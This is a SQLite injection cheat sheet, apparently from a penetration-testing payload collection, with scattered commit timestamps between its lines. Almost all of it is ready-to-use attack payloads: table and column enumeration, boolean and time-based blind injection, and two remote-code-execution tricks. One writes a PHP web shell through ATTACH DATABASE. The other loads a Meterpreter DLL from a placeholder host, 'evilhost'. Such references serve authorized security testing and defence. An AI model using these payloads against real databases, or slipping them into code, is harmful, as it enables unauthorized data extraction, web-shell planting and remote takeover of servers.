2017-02-21 08:16:51 +00:00
# SQLite Injection
2016-11-29 16:27:35 +00:00
2018-05-16 21:33:14 +00:00
## SQLite comment
```sql
--
/**/
2018-03-12 08:17:31 +00:00
```
2018-05-16 21:33:14 +00:00
## SQLite version
```sql
2018-03-12 08:17:31 +00:00
select sqlite_version();
```
2017-02-21 08:16:51 +00:00
## Integer/String based - Extract table name
2018-05-16 21:33:14 +00:00
```sql
2017-02-21 08:16:51 +00:00
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
```
Use limit X+1 offset X, to extract all tables.
## Integer/String based - Extract column name
2018-05-16 21:33:14 +00:00
```sql
2017-02-21 08:16:51 +00:00
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
```
For a clean output
2018-05-16 21:33:14 +00:00
```sql
2017-02-21 08:16:51 +00:00
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
```
## Boolean - Count number of tables
2018-05-16 21:33:14 +00:00
```sql
2017-02-21 08:16:51 +00:00
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
```
## Boolean - Enumerating table name
2018-05-16 21:33:14 +00:00
```sql
2017-02-21 08:16:51 +00:00
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
```
## Boolean - Extract info
2018-05-16 21:33:14 +00:00
```sql
2017-02-21 08:16:51 +00:00
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
```
2018-05-16 21:33:14 +00:00
## Time based
```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
2016-11-29 16:27:35 +00:00
```
2018-05-16 21:33:14 +00:00
## Remote Command Execution using SQLite command - Attach Database
```sql
2018-03-12 08:17:31 +00:00
ATTACH DATABASE '/var/www/lol.php' AS lol;
2016-11-29 16:27:35 +00:00
CREATE TABLE lol.pwn (dataz text);
2018-03-12 08:17:31 +00:00
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?> ');--
2016-11-29 16:27:35 +00:00
```
2017-02-21 08:16:51 +00:00
## Remote Command Execution using SQLite command - Load_extension
2018-05-16 21:33:14 +00:00
```sql
2016-11-29 16:27:35 +00:00
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```
2017-02-21 08:16:51 +00:00
Note: By default this component is disabled
## Thanks to
2018-03-12 08:17:31 +00:00
[Injecting SQLite database based application - Manish Kishan Tanwar ](https://www.exploit-db.com/docs/41397.pdf )
